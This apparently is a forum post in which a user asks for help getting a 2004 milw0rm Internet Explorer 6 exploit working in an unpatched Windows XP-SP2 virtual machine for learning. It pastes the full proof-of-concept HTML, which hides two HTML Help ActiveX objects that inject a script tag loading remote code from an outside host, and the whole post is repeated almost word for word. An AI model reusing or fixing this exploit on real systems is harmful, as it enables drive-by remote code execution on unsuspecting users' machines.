D
Diogo
I'm trying to recreate an old IE 6.0 vulnerability in a windows XP-SP2 box,
for learning purposes.
I'm using VMware (XP-SP2 unpatched box).
When I browse to my index.htm page I get the following error:
"An error has occured in the script onthis page.
Line: 4
Char: 1
Error: Invalid character
Code: 0
URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
Do you want to continue running scripts on this page?"
I then punch yes but nothing happens.
This is the code behind my index.htm
"Download this file as well for your own testing: original htm.txt
http://www.milw0rm.com/down.php?id=723
//str0ke
-->
<html><head><title>CMDExe - Windows Exploit - Remote code execution with
parameters - Proof of Concept</title></head><BODY
style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this
exploit can be found at <a
href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm"
target="_new">hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. ? 2004 ShredderSub7
<script>
function DisplayLocStrings() {
Title.innerHTML = TAG_SYSCONFIG;
Config_Link.innerHTML = TAG_OPENSYSCONFIG;
Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
}
</script>
<br><OBJECT style="display:none" id="locate" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"javascript\\\"
src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT
<script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>
// milw0rm.com [2004-12-28]"
Could someone help please.
for learning purposes.
I'm using VMware (XP-SP2 unpatched box).
When I browse to my index.htm page I get the following error:
"An error has occured in the script onthis page.
Line: 4
Char: 1
Error: Invalid character
Code: 0
URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
Do you want to continue running scripts on this page?"
I then punch yes but nothing happens.
This is the code behind my index.htm
"Download this file as well for your own testing: original htm.txt
http://www.milw0rm.com/down.php?id=723
//str0ke
-->
<html><head><title>CMDExe - Windows Exploit - Remote code execution with
parameters - Proof of Concept</title></head><BODY
style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this
exploit can be found at <a
href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm"
target="_new">hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. ? 2004 ShredderSub7
<script>
function DisplayLocStrings() {
Title.innerHTML = TAG_SYSCONFIG;
Config_Link.innerHTML = TAG_OPENSYSCONFIG;
Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
}
</script>
<br><OBJECT style="display:none" id="locate" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"javascript\\\"
src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT
<script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>
// milw0rm.com [2004-12-28]"
Could someone help please.